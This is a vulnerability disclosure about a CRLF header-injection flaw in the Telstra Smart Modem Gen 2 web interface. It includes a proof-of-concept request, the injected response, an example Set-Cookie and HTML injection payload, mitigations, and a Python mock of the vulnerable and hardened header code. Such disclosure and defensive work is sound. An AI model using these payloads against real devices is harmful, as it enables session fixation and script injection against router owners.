Submit #480045: Telstra Smart Modem Generation 2 HTTP Response Header Injection

Info

Title: Telstra Smart Modem Generation 2 HTTP Response Header Injection
Description: A vulnerability was recently discovered in the HTTP(S) remote access web page of the Telstra Smart Modem Gen 2. It allows HTTP response header injection: an attacker can add arbitrary headers to the server's response and potentially inject malicious content into it. The cause is that user-supplied data is copied into the Content-Disposition response header without validation or sanitization. The issue was demonstrated by sending a specially crafted HTTP GET request for the robots.txt resource with a payload appended to the URL path:

"""
GET /robots.txtcy4y9%0d%0ai3o0z HTTP/1.1
Host: *.***.**.***
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Connection: close
Cache-Control: max-age=0
"""

The request appends the payload cy4y9%0d%0ai3o0z to the resource path. Once the server URL-decodes the path, %0d%0a becomes a literal CRLF, the sequence that ends a header line, so whatever follows it is read as a new header (or, after a double CRLF, as the start of the response body). The server processed the request and returned the following malformed response:

"""
HTTP/1.1 302 Found
Server: nginx/1.15.10
Date: Mon, 13 Jan 2025 04:30:25 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
Content-Disposition: attachment; filename=robots.txtcy4y9
i3o0z:
Location: /relogin.htm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Frame-Options: SAMEORIGIN
Access-Control-Allow-Origin: http://mymodem.gateway:85
"""

The Content-Disposition header is built from the user-supplied value robots.txtcy4y9, but the decoded %0d%0a terminates it early, and the rest of the payload appears as a new, invalid header line, i3o0z:.

By placing further content after the %0d%0a, an attacker could inject arbitrary HTTP headers or even start the response body with crafted content. For example, inserting %0d%0aSet-Cookie: sessionid=malicious%0d%0a%0d%0a<html> would set an attacker-chosen cookie and insert HTML or JavaScript into the response body. One caveat when assessing impact: in the response above the server emits Content-Length: 0 before the injected position, so a client that honours it reads no body at all, and a payload that ends the header block early also pushes the server's own Location header and the security headers after it into that discarded body. Injecting additional headers such as Set-Cookie is therefore the more reliable outcome against a browser.

Attempts were made to contact Telstra Support about this vulnerability, but no reply was received.

Strategies to mitigate this vulnerability:
- Validate all user-supplied input before it is incorporated into an HTTP header.
- Reject any input containing control characters (in particular CR, LF and NUL) or other unsafe sequences.
- Encode the value so that special characters cannot terminate or alter the header; for Content-Disposition, the percent-encoded filename*= form defined in RFC 6266 (using the RFC 5987 encoding) is the standard way to do this.
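The following Python stand-in, added here as an example and not code from the submission or from Telstra, reproduces the header construction described above beside a hardened version, and includes the parsing check a tester would run against a captured response. The handler is a constructed mock: how the real device derives the filename from the path (assumed here to be the URL-decoded last path segment) is an assumption, as is the fixed set of headers the mock emits.

```python
"""Constructed stand-in for the modem's download handler (not Telstra firmware code).

It shows (1) how copying a URL-decoded path segment straight into
Content-Disposition lets %0d%0a terminate the header line, and (2) a hardened
builder that rejects control characters and percent-encodes the filename as
defined in RFC 6266 / RFC 5987.
"""
import re
from urllib.parse import quote, unquote

# Any ASCII control character, including CR (0x0d), LF (0x0a) and NUL.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def filename_from_path(path: str) -> str:
    """Assumed server behaviour: last path segment, URL-decoded.
    Decoding is what turns %0d%0a into a literal CRLF."""
    return unquote(path.rsplit("/", 1)[-1])


def vulnerable_response(path: str) -> bytes:
    """Unsafe: the decoded filename is concatenated into a header line unchecked."""
    name = filename_from_path(path)
    lines = [
        "HTTP/1.1 302 Found",
        "Content-Length: 0",
        f"Content-Disposition: attachment; filename={name}",
        "Location: /relogin.htm",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def safe_content_disposition(name: str) -> str:
    """Reject control characters outright, then percent-encode everything outside
    RFC 5987's attr-char set so quotes, semicolons, CR and LF can never end or
    alter the header."""
    if CONTROL_CHARS.search(name):
        raise ValueError("control character in filename")
    return f"Content-Disposition: attachment; filename*=UTF-8''{quote(name, safe='')}"


def hardened_response(path: str) -> bytes:
    """Same mock handler with the fix: an invalid name gets a 400, not a header."""
    try:
        disposition = safe_content_disposition(filename_from_path(path))
    except ValueError:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    lines = ["HTTP/1.1 302 Found", "Content-Length: 0", disposition, "Location: /relogin.htm"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status line, {header name: [values]}).
    A header name the server never sets is the tell-tale of an injection."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip(), []).append(value.strip())
    return status, headers


# Headers the mock handler legitimately emits (an assumption of this example).
EXPECTED_HEADERS = {"Content-Length", "Content-Disposition", "Location"}


def injected_headers(raw: bytes) -> set:
    """Names present in the response that the handler does not legitimately emit."""
    _, headers = parse_response(raw)
    return set(headers) - EXPECTED_HEADERS


if __name__ == "__main__":
    poc = "/robots.txtcy4y9%0d%0ai3o0z"  # path from the submission
    print(vulnerable_response(poc).decode("latin-1"))
    print("injected header names:", injected_headers(vulnerable_response(poc)))
    print(hardened_response(poc).decode("latin-1"))
```

Run against a live target, the same `parse_response` check applies to the bytes read off the socket: a header name equal to the marker you placed after %0d%0a proves the decoded CRLF reached the response unescaped.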
Source: https://github.com/bloodbile/Telstra-RHI
User: grunge (UID 80129)
Submitted: 13/01/2025 07:25 (1 year ago)
Moderated: 24/01/2025 10:22 (11 days later)
Status: Accepted
VulDB Entry: 293223 [Telstra Smart Modem Gen 2 up to 20250115 HTTP Header Content-Disposition privilege escalation]
Points: 20
